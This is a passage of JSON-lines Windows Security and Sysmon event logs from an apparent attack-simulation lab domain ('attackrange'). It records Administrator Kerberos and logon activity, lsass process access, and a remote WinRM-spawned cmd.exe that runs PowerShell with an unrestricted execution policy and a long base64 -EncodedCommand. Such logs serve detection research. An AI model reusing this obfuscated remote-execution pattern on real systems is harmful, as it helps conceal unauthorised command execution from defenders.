Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220625,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220626,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220627,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x88388\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x88388","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220628,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x88388\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x88388","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5846,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5847,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5848,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.371\r\nProcessGuid: {E2A3D6B1-11D8-5F25-0000-0010B9830800}\r\nProcessId: 4184\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-11D8-5F25-0000-0010F7800800}\r\nParentProcessId: 5064\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.371","ProcessGuid":"{E2A3D6B1-11D8-5F25-0000-0010B9830800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEk